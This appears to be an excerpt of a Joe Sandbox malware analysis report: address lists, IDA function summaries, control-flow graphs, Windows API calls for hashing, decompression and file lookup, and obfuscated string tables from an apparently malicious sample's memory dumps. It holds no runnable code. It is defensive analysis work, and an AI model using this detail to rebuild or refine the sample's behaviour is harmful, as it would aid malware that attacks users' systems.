                                                              0x00882a3c
                                                              0x00882a47
                                                              0x00882a52
                                                              0x00882a5d
                                                              0x00882a68
                                                              0x00882a73
                                                              0x008829e5
                                                              0x008829eb
                                                              0x00882a01
                                                              0x00882a0c
                                                              0x00882a19
                                                              0x00882a24
                                                              0x00882a2f
                                                              0x00882a2f
                                                              0x00882a7c
                                                              0x00882a86
                                                              0x00882883
                                                              0x0088288b
                                                              0x00882890
                                                              0x00882897
                                                              0x00882899
                                                              0x008828a4
                                                              0x008828ad
                                                              0x008828b6
                                                              0x008828c1
                                                              0x008828cc
                                                              0x008828df
                                                              0x008828e4
                                                              0x008828fb
                                                              0x008828fb
                                                              0x00882a91
                                                              0x00882aa7
                                                              0x00882abd
                                                              0x00882aca
                                                              0x00882ad7
                                                              0x00882ae4
                                                              0x00882af1
                                                              0x00882af4
                                                              0x00882afc
                                                              0x00882b02
                                                              0x00882b03
                                                              0x00882b08
                                                              0x00882b0c
                                                              0x00882b15
                                                              0x00882b22
                                                              0x00882b2d
                                                              0x00882b38
                                                              0x00882b3d
                                                              0x00882b4b
                                                              0x00882b53
                                                              0x00882b5c
                                                              0x00882b6a
                                                              0x00882b6f
                                                              0x00882b77
                                                              0x00882b84
                                                              0x00882b8a
                                                              0x00882b95
                                                              0x00882b98
                                                              0x00882ba0
                                                              0x00882ba0
                                                              0x00882b4b
                                                              0x00882ba5
                                                              0x00882bb0
                                                              0x00882bbb
                                                              0x00882bc0
                                                              0x00882bcb
                                                              0x00882bd2
                                                              0x00882bd7
                                                              0x00882be3
                                                              0x00882be8
                                                              0x00882bf0
                                                              0x00882bf3
                                                              0x00882bfa
                                                              0x00882c04
                                                              0x00882c06
                                                              0x00882c06
                                                              0x00882c0a
                                                              0x00882c11
                                                              0x00882c1b
                                                              0x00882c1d
                                                              0x00882c1d
                                                              0x00882c21
                                                              0x00882c28
                                                              0x00882c32
                                                              0x00882c34
                                                              0x00882c34
                                                              0x00882c38
                                                              0x00882c3f
                                                              0x00882c49
                                                              0x00882c4b
                                                              0x00882c4b
                                                              0x00882c4b
                                                              0x00882c4b
                                                              0x00882c5d
                                                              0x00882c62
                                                              0x00882c7b
                                                              0x00882c80
                                                              0x00882c99
                                                              0x00882c9e
                                                              0x00882cb7
                                                              0x00882cbc
                                                              0x00882cd5
                                                              0x00882cda
                                                              0x00882cf3
                                                              0x00882cf8
                                                              0x00882cfe
                                                              0x00882d11
                                                              0x00882d16
                                                              0x00882d2f
                                                              0x00882d34
                                                              0x00882d4d
                                                              0x00882d52
                                                              0x00882d6b
                                                              0x00882d70
                                                              0x00882d89
                                                              0x00882d8e
                                                              0x00882da7
                                                              0x00882dac
                                                              0x00882dc5
                                                              0x00882dca
                                                              0x00882de3
                                                              0x00882de8
                                                              0x00882e01
                                                              0x00882e06
                                                              0x00882e1f
                                                              0x00882e24
                                                              0x00882e38
                                                              0x00882e3d
                                                              0x00882e56
                                                              0x00882e5b
                                                              0x00882e74
                                                              0x00882e79
                                                              0x00882e92
                                                              0x00882e97
                                                              0x00882eb0
                                                              0x00882eb5
                                                              0x00882ece
                                                              0x00882ed3
                                                              0x00882eec
                                                              0x00882ef1
                                                              0x00882f0a
                                                              0x00882f0f
                                                              0x00882f15
                                                              0x00882f28
                                                              0x00882f2d
                                                              0x00882f46
                                                              0x00882f4b
                                                              0x00882f64
                                                              0x00882f69
                                                              0x00882f82
                                                              0x00882f87
                                                              0x00882fa0
                                                              0x00882fa5
                                                              0x00882fbe
                                                              0x00882fc3
                                                              0x00882fdc
                                                              0x00882fe1
                                                              0x00882fe7
                                                              0x00882fff
                                                              0x00883004
                                                              0x0088301d
                                                              0x00883022
                                                              0x0088303b
                                                              0x00883051
                                                              0x0088305f
                                                              0x00883066
                                                              0x00883071
                                                              0x00883078
                                                              0x0088307b
                                                              0x00883083
                                                              0x00883086
                                                              0x00883089
                                                              0x0088308f
                                                              0x00883094
                                                              0x0088309f
                                                              0x0088309f
                                                              0x008830a6
                                                              0x008830a9
                                                              0x008830ac
                                                              0x008830b3
                                                              0x008830b6
                                                              0x008830c4
                                                              0x008830d0
                                                              0x008830da
                                                              0x008830e3
                                                              0x008830ec
                                                              0x008830f1
                                                              0x008830f7
                                                              0x008830ff
                                                              0x00883102
                                                              0x00883111
                                                              0x00883116
                                                              0x0088311c
                                                              0x00883124
                                                              0x00883127
                                                              0x00883138
                                                              0x00883149
                                                              0x0088314e
                                                              0x00883154
                                                              0x0088315c
                                                              0x0088315f
                                                              0x00883170
                                                              0x00883181
                                                              0x00883186
                                                              0x0088318c
                                                              0x00883194
                                                              0x00883197
                                                              0x008831a8
                                                              0x008831b9
                                                              0x008831be
                                                              0x008831c4
                                                              0x008831cc
                                                              0x008831cf
                                                              0x008831e0
                                                              0x008831f1
                                                              0x008831f6
                                                              0x008831fc
                                                              0x00883204
                                                              0x00883207
                                                              0x00883218
                                                              0x00883229
                                                              0x0088323b
                                                              0x0088324c
                                                              0x00883251
                                                              0x00883257
                                                              0x0088325f
                                                              0x00883262
                                                              0x00883273
                                                              0x00883284
                                                              0x00883289
                                                              0x0088328f
                                                              0x00883297
                                                              0x0088329a
                                                              0x008832ab
                                                              0x008832bc
                                                              0x008832c1
                                                              0x008832c7
                                                              0x008832cf
                                                              0x008832d2
                                                              0x008832e3
                                                              0x008832f1
                                                              0x008832fc
                                                              0x008832fc
                                                              0x00883309
                                                              0x0088331f
                                                              0x0088332a
                                                              0x0088332f
                                                              0x00883332
                                                              0x0088334d
                                                              0x0088335b
                                                              0x00883363
                                                              0x0088336e
                                                              0x00883381
                                                              0x0088338c
                                                              0x00883399
                                                              0x008833a4
                                                              0x008833a4
                                                              0x008833b4
                                                              0x008833c6
                                                              0x008833d0
                                                              0x008833d5
                                                              0x00883429
                                                              0x00883436
                                                              0x00883441
                                                              0x0088344c
                                                              0x00883455
                                                              0x0088345f
                                                              0x0088346a
                                                              0x008833d7
                                                              0x008833e5
                                                              0x008833f0
                                                              0x008833fb
                                                              0x00883406
                                                              0x00883411
                                                              0x0088341c
                                                              0x0088341c
                                                              0x008833b6
                                                              0x008833bc
                                                              0x008833bc
                                                              0x00883475
                                                              0x00883480
                                                              0x00883489
                                                              0x00883495
                                                              0x0088349b
                                                              0x008834a6
                                                              0x008834af
                                                              0x008834b4
                                                              0x008834b9
                                                              0x008834c0
                                                              0x008834c6
                                                              0x008834ca
                                                              0x008834ce
                                                              0x008834d7
                                                              0x008834e1
                                                              0x008834f4
                                                              0x008834f8
                                                              0x008834fb
                                                              0x00883501
                                                              0x0088350a
                                                              0x00883510
                                                              0x0088351b
                                                              0x0088351e
                                                              0x00883528
                                                              0x0088352d
                                                              0x00883535
                                                              0x00883544
                                                              0x00883549
                                                              0x00883554
                                                              0x00883559
                                                              0x0088355c
                                                              0x008834fb
                                                              0x00883562
                                                              0x00883565
                                                              0x0088356c
                                                              0x00883574
                                                              0x00883576
                                                              0x00883576
                                                              0x00883580
                                                              0x00883582
                                                              0x00883587
                                                              0x0088358d
                                                              0x00000000
                                                              0x0088358d
                                                              0x00883592
                                                              0x00883592
                                                              0x00882716
                                                              0x008825bb
                                                              0x008821a8

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.452273015.000000000041A000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 0000000A.00000002.452127840.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              • Associated: 0000000A.00000002.475906775.00000000008B0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              • Associated: 0000000A.00000002.476010495.00000000008B9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_400000_ADCA.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $,`_L$.$Api-ms-win-downlevel-advapi32-l1-1-1.dll$CustomMarshalers.dll$DevicePairingHandler.dll$FXSCOVER.exe$KBDBGPH.DLL$Microsoft.Windows.Diagnosis.TroubleshootingPack.resources.dll$MmcAspExt.dll$NlsData0047.dll$OleCreateFromDataEx$RegGetKeySecurity$RtlDelete$RtlQuerySecurityObject$RtlUnicodeStringToOemSize$SensorsApi.dll$System.Configuration.Install.ni.dll$System.IO.dll$VarCyMulI8$igd10umd32.dll$mssitlb.dll$mswmdm.dll$oleacchooks.dll$spwmp.dll$ttt
                                                              • API String ID: 0-3012302763
                                                              • Opcode ID: 837c685f78292b0f1606fd949dab1544831e29e3e3fc60c96b0bd03d4c7ad5a8
                                                              • Instruction ID: 0ae2afd8c63baf23de251440c667564a859947553ed072fb774a3222ecfdf207
                                                              • Opcode Fuzzy Hash: 837c685f78292b0f1606fd949dab1544831e29e3e3fc60c96b0bd03d4c7ad5a8
                                                              • Instruction Fuzzy Hash: 2A23153490425D8FDB10EFA4D881BDDBBB5FF0A308F1040AAE444B77A2D639AA55CF65
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00897244 Relevance: 66.4, Strings: 50, Instructions: 3903COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.452273015.000000000041A000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 0000000A.00000002.452127840.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              • Associated: 0000000A.00000002.475906775.00000000008B0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              • Associated: 0000000A.00000002.476010495.00000000008B9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_400000_ADCA.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $$$,$,`_L$BrEvIF.dll$CNHL610.DLL$ElfReportEventAndSourceW$GetClassFile$GetOverlappedAccessResults$IPBusEnumProxy.dll$KBDLT.DLL$KBDUSR.DLL$MigSetup.exe$NAPSTAT.EXE$NetDfsRemove$NetSetPrimaryComputerName$PresentationCore.dll$RtlEqualLuid$SfmDxSetSwapChainBindingStatus$StgOpenStorageOnILockBytes$^$api-ms-win-core-interlocked-l1-1-0.dll$api-ms-win-core-processenvironment-l1-1-0.dll$api-ms-win-core-profile-l1-1-0.dll$bcdedit.exe$dmdskmgr.dll$esscli.dll$mciseq.dll$mstask.dll$netshell.dll$s$sdclt.exe$vmictimeprovider.dll
                                                              • API String ID: 0-3570173003
                                                              • Opcode ID: 765d7ee5cd3482c3e572a7b0b00ebe5888e4cb3d417b3a14dceebf025310320a
                                                              • Instruction ID: d5705780c892bafa6df46128ae735e4f56b141e536515f108fab6bc7d1f2bfca
                                                              • Opcode Fuzzy Hash: 765d7ee5cd3482c3e572a7b0b00ebe5888e4cb3d417b3a14dceebf025310320a
                                                              • Instruction Fuzzy Hash: E8933B3490826ACFDB00DF68E981ADDBBF5FB4A304F1040A6D448B7B61D734AA55CF66
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00885B34 Relevance: 64.6, APIs: 1, Strings: 35, Instructions: 1564COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 2113 885b34-885b38 2114 885b3d-885b42 2113->2114 2114->2114 2115 885b44-885b6e 2114->2115 2116 885b74 2115->2116 2117 888605-888609 2115->2117 2116->2117 2118 88860f-888613 2117->2118 2119 889f95-88a29f call 4076f4 call 40a324 call 40a34c call 40a324 call 40a34c call 40a324 call 40a34c call 40a324 call 40a34c call 40a324 call 40a34c call 40a324 call 40a34c call 40a324 call 40a34c call 40a324 call 40a34c call 40a324 call 40a34c call 40aa98 call 4076f4 call 409d28 * 2 call 409cf8 call 409d28 * 6 call 409c98 2117->2119 2118->2119 2120 888619-888647 call 4076f4 2118->2120 2126 88879d-8887ed call 40a0c0 call 6c0b28 call 4076e8 2120->2126 2127 88864d-888656 2120->2127 2152 8887ff-888870 call 40a0c0 * 2 call 422c7c call 40ab7c call 40a624 call 878884 call 881940 2126->2152 2153 8887ef-8887fa 2126->2153 2130 888658-8886be call 4076e8 2127->2130 2131 8886c0-888715 2127->2131 2136 88871a-88873e call 407278 2130->2136 2131->2136 2136->2126 2145 888740-888798 call 4076f4 * 2 2136->2145 2145->2126 2183 888875-888877 2152->2183 2153->2152 2185 88887d-888881 2183->2185 2186 889b67-889b69 2183->2186 2189 88888f-888898 2185->2189 2190 888883-888884 2185->2190 2188 889b6c-889b75 2186->2188 2196 889b7b-889bae call 40a0c0 * 2 2188->2196 2197 889f2f-889f36 2188->2197 2193 8888f8-888907 call 40acb4 2189->2193 2194 88889a-8888a6 2189->2194 2191 88998a-8899c0 call 407278 2190->2191 2192 88888a 2190->2192 2216 8899de-8899f9 call 8764fc 2191->2216 2217 8899c2-8899dc 2191->2217 2199 889a27-889a35 2192->2199 2214 88890d-888921 call 40a0c0 2193->2214 2215 8889a7-8889af call 40a0c0 2193->2215 2201 8888a8-8888f0 call 40a0c0 * 5 2194->2201 2202 8888f2-8888f6 2194->2202 2244 889bb0 2196->2244 2245 889bb4-889bc5 2196->2245 2197->2188 2205 889f3c-889f75 call 40a0c0 * 2 call 40acec call 40acb4 2197->2205 2212 889a3b-889a4f 2199->2212 2213 889ad6-889b62 call 40a0c0 * 5 call 40acec call 40a0c0 call 40acec call 40a0c0 * 2 2199->2213 2201->2202 2202->2193 2202->2194 2294 889f8a-889f90 call 40a0c0 2205->2294 2295 889f77-889f85 call 40acec 2205->2295 2222 889aa9-889ad1 call 40a0c0 call 40acec call 40a0c0 2212->2222 2223 889a51-889aa4 call 40acec * 3 call 40a0c0 * 2 2212->2223 2213->2186 2250 888923-888982 call 40acec * 4 call 40a0c0 * 2 2214->2250 2251 888987-8889a5 call 40acec call 40a0c0 2214->2251 2241 8889b4-888a5d call 40a0c0 * 2 call 40acec call 40a0c0 call 6c08bc call 40acec call 40a0c0 * 3 2215->2241 2227 8899fe-889a1f call 40a0c0 * 2 2216->2227 2217->2227 2222->2213 2223->2222 2227->2199 2292 889a22 call 40acec 2227->2292 2365 888a5f-888ac9 call 4076e8 2241->2365 2366 888ad1-888ae0 call 40acb4 2241->2366 2244->2245 2256 889bcb-889be2 2245->2256 2257 889bc7 2245->2257 2250->2251 2251->2241 2270 889beb-889f29 call 40a3c0 * 25 call 40a494 call 40a9e8 call 40acec * 2 2256->2270 2271 889be4 2256->2271 2257->2256 2270->2196 2270->2197 2271->2270 2292->2199 2294->2119 2295->2294 2365->2366 2377 888b3a-888b98 2366->2377 2378 888ae2-888b38 call 4076f4 2366->2378 2383 888ba7-888beb call 870fd8 2377->2383 2378->2383 2394 888bed-888c11 call 87fa9c 2383->2394 2395 888c13-888c28 call 40a0c0 2383->2395 2403 888c2d-888c7d call 4076e8 call 6c0994 call 6c0a40 call 6c0a5c 2394->2403 2395->2403 2422 888c83-888c9b call 40aefc 2403->2422 2423 888d66-888d74 call 40acec 2403->2423 2431 888c9d-888cdd call 4076f4 call 40a0c0 * 4 2422->2431 2432 888cdf-888d36 call 40acec * 2 call 40a0c0 call 40acec call 40a0c0 * 2 2422->2432 2429 888d79-888de0 call 40a0c0 * 5 call 6c0a40 * 2 RtlDecompressBuffer 2423->2429 2486 889452-889471 2429->2486 2487 888de6-888df2 2429->2487 2474 888d3b-888d64 call 40a0c0 call 40acec call 40a0c0 2431->2474 2432->2474 2474->2429 2490 8894dd-8894f2 2486->2490 2491 889473-889475 2486->2491 2492 888df5-888dfe 2487->2492 2496 88950a-889528 2490->2496 2497 8894f4-889505 2490->2497 2495 889478-8894db 2491->2495 2498 888e5c-888e7c call 40a0c0 call 87eb5c 2492->2498 2499 888e00-888e5a call 4076f4 2492->2499 2495->2490 2495->2495 2502 88952e-889543 2496->2502 2503 889605-88961a call 407eac 2496->2503 2497->2496 2498->2492 2519 888e82-888ed4 call 40a0c0 * 2 call 40acec call 6c0a5c call 6c0994 2498->2519 2499->2498 2507 8895a1-889600 call 4076e8 2502->2507 2508 889545-88959f 2502->2508 2507->2503 2508->2503 2530 888fa9-888fd8 call 40a0c0 * 3 2519->2530 2531 888eda-888ee6 2519->2531 2552 888fde-888fe7 2530->2552 2553 88909f-8890a8 2530->2553 2533 888ee8-888f37 call 40a0c0 * 5 call 40acec 2531->2533 2534 888f3f-888f55 call 40a0c0 2531->2534 2533->2534 2542 888f9f-888fa3 2534->2542 2543 888f57-888f9a call 40a0c0 * 6 2534->2543 2542->2530 2542->2531 2543->2542 2556 889038-88909a call 40acec * 4 call 40a0c0 * 2 2552->2556 2557 888fe9-889033 call 40a0c0 * 6 2552->2557 2559 8892de-889327 call 40acec call 40a0c0 * 5 2553->2559 2560 8890ae-8890e8 call 40a0c0 call 40acec call 40a0c0 2553->2560 2619 88932c-88933a 2556->2619 2557->2619 2559->2619 2597 8890ea 2560->2597 2598 8890ee-8890ff 2560->2598 2597->2598 2603 889101 2598->2603 2604 889105-8892dc call 40a3c0 * 14 call 40a494 call 40a9e8 call 40a0c0 * 2 2598->2604 2603->2604 2604->2619 2623 889349-889363 call 6c0a40 call 6c0b28 2619->2623 2624 88933c-889344 call 40a0c0 2619->2624 2635 889366-88936f 2623->2635 2624->2623 2637 8893dc-8893e3 2635->2637 2638 889371-8893da call 4076e8 call 4076f4 2635->2638 2637->2635 2642 8893e5-8893f6 2637->2642 2638->2637 2645 8893f8-889408 2642->2645 2646 88940a-889415 2642->2646 2649 88941a-88944d call 40a0c0 * 2 call 40acec call 40a0c0 2645->2649 2646->2649 2649->2486
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.452273015.000000000041A000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 0000000A.00000002.452127840.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              • Associated: 0000000A.00000002.475906775.00000000008B0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              • Associated: 0000000A.00000002.476010495.00000000008B9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_400000_ADCA.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $ $ $ $ $ $,`_L$AuthFWWizFwk.dll$CNB_0279.DLL$CreateEventExA$CryptGetDefaultProviderA$EventWrite$GetInformationCodeAuthzLevelW$GetUserObjectInformationA$IMJPAPI.DLL$MPG4DECD.DLL$Microsoft.Windows.Diagnosis.SDuser.ni.dll$NlsLexicons0007.dll$RtlGetFullPathName_U$System.Data.DataSetExtensions.dll$System.Runtime.Serialization.Xml.dll$VarI4FromR8$WMPEncEn.dll$WcsPlugInService.dll$api-ms-win-core-namedpipe-l1-1-0.dll$api-ms-win-core-processthreads-l1-1-0.dll$api-ms-win-core-threadpool-l1-1-0.dll$hpzprw71.dll$imkrhjd.dll$mimefilt.dll$oledb32r.dll$srcore.dll$sspisrv.dll$w3ctrs.dll$wow64win.dll
                                                              • API String ID: 0-2497120837
                                                              • Opcode ID: bd6f776698bf5ebe3350416b0fe2377eecb546d571adda2870142f05ecf6b7a2
                                                              • Instruction ID: ed27780ebbea777809120fd9b064ea54145ce40deeb132efdad1df661e81c355
                                                              • Opcode Fuzzy Hash: bd6f776698bf5ebe3350416b0fe2377eecb546d571adda2870142f05ecf6b7a2
                                                              • Instruction Fuzzy Hash: 28F2F635908219CFDB04EFA8E981ACDB7F9FB49304F2040AAE444B76A1D735AE45CF65
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00878884 Relevance: 63.5, APIs: 7, Strings: 28, Instructions: 2271encryptionCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,?,008A9A44,00000000,0087AFBF,?,?,?,?,?,00000000), ref: 00878AFB
                                                              • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000,?,00000000,0087AD62,?,?,?,?,?,?,00000000,0087B0A4), ref: 00878B94
                                                              • CryptHashData.ADVAPI32(00000000,008A4525,00000000,00000000,299E4F10,?,00000000,0087A507,?,?,?,?,?,?,?,00000000), ref: 00878EE3
                                                              • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,0000000C,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00879370
                                                              • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,008A4525), ref: 00879732
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.452273015.000000000041A000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 0000000A.00000002.452127840.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              • Associated: 0000000A.00000002.475906775.00000000008B0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              • Associated: 0000000A.00000002.476010495.00000000008B9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_400000_ADCA.jbxd
                                                              Similarity
                                                              • API ID: Crypt$Hash$Param$AcquireContextCreateData
                                                              • String ID: $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $I$MSTTSuser.dll$NlsData004e.dll$OleInitializeWOW$QuerySendMessage$System.Diagnostics.TextWriterTraceListener.dll$System.Speech.ni.dll$api-ms-win-core-fibers-l1-1-0.dll$dpnlobby.dll$wcsstr$wkscli.dll
                                                              • API String ID: 2428702908-381973374
                                                              • Opcode ID: 4aa3557ba7c9669ed2d383384b856f4c218db0c9a910a5b0a0425b3726d68a2c
                                                              • Instruction ID: cf61213450a772018895127d1e37cd81cfaede83b8eb6fc4599cb68f8fb24d5b
                                                              • Opcode Fuzzy Hash: 4aa3557ba7c9669ed2d383384b856f4c218db0c9a910a5b0a0425b3726d68a2c
                                                              • Instruction Fuzzy Hash: 90334034909259CFEB00DF68EC81BCDBBB5FB4A304F1080A6D488A7B61D735AA56CF55
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0087885C Relevance: 45.0, APIs: 6, Strings: 19, Instructions: 1298encryptionCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,?,008A9A44,00000000,0087AFBF,?,?,?,?,?,00000000), ref: 00878AFB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.452273015.000000000041A000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 0000000A.00000002.452127840.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              • Associated: 0000000A.00000002.475906775.00000000008B0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              • Associated: 0000000A.00000002.476010495.00000000008B9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_400000_ADCA.jbxd
                                                              Similarity
                                                              • API ID: AcquireContextCrypt
                                                              • String ID: $ $ $ $ $ $ $ $ $ $ $I$NlsData004e.dll$QuerySendMessage$System.Diagnostics.TextWriterTraceListener.dll$System.Speech.ni.dll$api-ms-win-core-fibers-l1-1-0.dll$dpnlobby.dll$wkscli.dll
                                                              • API String ID: 3951991833-648863503
                                                              • Opcode ID: cb655dd901a2edca7c057b9806bcc2dc5e851f49d6a569c3868c3ae72fad8629
                                                              • Instruction ID: 1badded1f196fce5c145a215bd205b4eb7a22d0e2d7c4048eae815bd25d821b8
                                                              • Opcode Fuzzy Hash: cb655dd901a2edca7c057b9806bcc2dc5e851f49d6a569c3868c3ae72fad8629
                                                              • Instruction Fuzzy Hash: F5D23D34909269CFEB00DF68E881BDDBBB5FB0A314F1080A6E489E7B61D734A945CF15
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0040D588 Relevance: 3.1, APIs: 2, Instructions: 63COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • GetUserDefaultUILanguage.KERNEL32(00000003,?,00000004,00000000,0040D648,?,?), ref: 0040D5BA
                                                              • GetLocaleInfoW.KERNEL32(?,00000003,?,00000004,00000000,0040D648,?,?), ref: 0040D5C3
                                                                • Part of subcall function 0040D450: FindFirstFileW.KERNEL32(00000000,?,00000000,0040D4AE,?,00000001), ref: 0040D483
                                                                • Part of subcall function 0040D450: FindClose.KERNEL32(00000000,00000000,?,00000000,0040D4AE,?,00000001), ref: 0040D493
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.452127840.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 0000000A.00000002.452273015.000000000041A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              • Associated: 0000000A.00000002.475906775.00000000008B0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              • Associated: 0000000A.00000002.476010495.00000000008B9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_400000_ADCA.jbxd
                                                              Similarity
                                                              • API ID: Find$CloseDefaultFileFirstInfoLanguageLocaleUser
                                                              • String ID:
                                                              • API String ID: 3216391948-0
                                                              • Opcode ID: c883772947d83777b864ba3430caf66e322057a584b7fefcdaed39e92a4a314e
                                                              • Instruction ID: 25030a7f6e56920aab91c9f9ef49b25f0e59bcaefeffaeca5518035f8508ca9f
                                                              • Opcode Fuzzy Hash: c883772947d83777b864ba3430caf66e322057a584b7fefcdaed39e92a4a314e
                                                              • Instruction Fuzzy Hash: 15118770E046099FDB00EF95C982AAEB7B5EF49304F50447EB505F73D2DB785E048659
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0040D450 Relevance: 3.0, APIs: 2, Instructions: 33fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindFirstFileW.KERNEL32(00000000,?,00000000,0040D4AE,?,00000001), ref: 0040D483
                                                              • FindClose.KERNEL32(00000000,00000000,?,00000000,0040D4AE,?,00000001), ref: 0040D493
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.452127840.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 0000000A.00000002.452273015.000000000041A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              • Associated: 0000000A.00000002.475906775.00000000008B0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              • Associated: 0000000A.00000002.476010495.00000000008B9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_400000_ADCA.jbxd
                                                              Similarity
                                                              • API ID: Find$CloseFileFirst
                                                              • String ID:
                                                              • API String ID: 2295610775-0
                                                              • Opcode ID: 7f3f629f4f65ece58cf40c0a0a45b63a812c2af1330b8aacf4586db4167fe9c0
                                                              • Instruction ID: f2ddfbd44667415a75ad9902d530f29ac780b5eb62706bbca6fac38aac60a985
                                                              • Opcode Fuzzy Hash: 7f3f629f4f65ece58cf40c0a0a45b63a812c2af1330b8aacf4586db4167fe9c0
                                                              • Instruction Fuzzy Hash: EAF0E970940608AEC750FBB9CC1298EB3ECDB093147A14577F404F32D1E63C5E045518
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00871424 Relevance: 64.5, APIs: 2, Strings: 34, Instructions: 1507COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 2680 871424-871427 2681 87142c-871431 2680->2681 2681->2681 2682 871433-8715b9 call 85e4bc call 870fd8 call 4076f4 call 40a324 call 40a34c call 40a324 call 40a34c call 40a324 call 40a34c call 40a324 call 40a34c call 40a324 call 40a34c call 40a324 call 40a34c call 40aa98 2681->2682 2715 8715bb-8715c5 2682->2715 2716 8715c8-8715ee call 40a884 call 40a0c0 2682->2716 2715->2716 2721 871674-8716ac call 40a0c0 * 4 2716->2721 2722 8715f4-8715f6 2716->2722 2740 8716ae-8716b8 2721->2740 2741 8716bb-8716e4 call 40a71c * 2 GetShortPathNameW call 40a0c0 2721->2741 2723 8715f9-87164d call 40a0c0 * 3 call 40acec call 40a0c0 * 2 2722->2723 2751 87164f-87166f call 40a0c0 * 3 2723->2751 2740->2741 2753 8716e9-8716f2 2741->2753 2751->2721 2755 871779-871798 call 40a0c0 * 2 2753->2755 2756 8716f8-8716fa 2753->2756 2769 871943-871991 call 40a0c0 call 40acec call 40a0c0 * 4 2755->2769 2770 87179e-8717d0 call 40a0c0 * 3 2755->2770 2758 8716fd-871767 call 40a0c0 call 40acec call 40a0c0 * 2 call 40acec * 2 2756->2758 2797 871769-871774 call 40a0c0 2758->2797 2808 871996-87199c call 40a0c0 2769->2808 2790 8717d6-8717e7 2770->2790 2791 8717d2 2770->2791 2794 8717ed-871941 call 40a3c0 * 10 call 40a494 call 40a9e8 call 40a0c0 * 2 2790->2794 2795 8717e9 2790->2795 2791->2790 2794->2808 2795->2794 2806 8719a1-8719b0 call 40acb4 2797->2806 2814 8719b6-8719c7 2806->2814 2815 871b70-871b87 call 40aefc 2806->2815 2808->2806 2817 8719cd-8719de 2814->2817 2818 8719c9 2814->2818 2827 871bcd-871c18 call 40acec call 40a0c0 * 5 2815->2827 2828 871b89-871bcb call 40a0c0 * 6 2815->2828 2821 8719e4-871b6b call 40a3c0 * 12 call 40a494 call 40a9e8 call 40a0c0 2817->2821 2822 8719e0 2817->2822 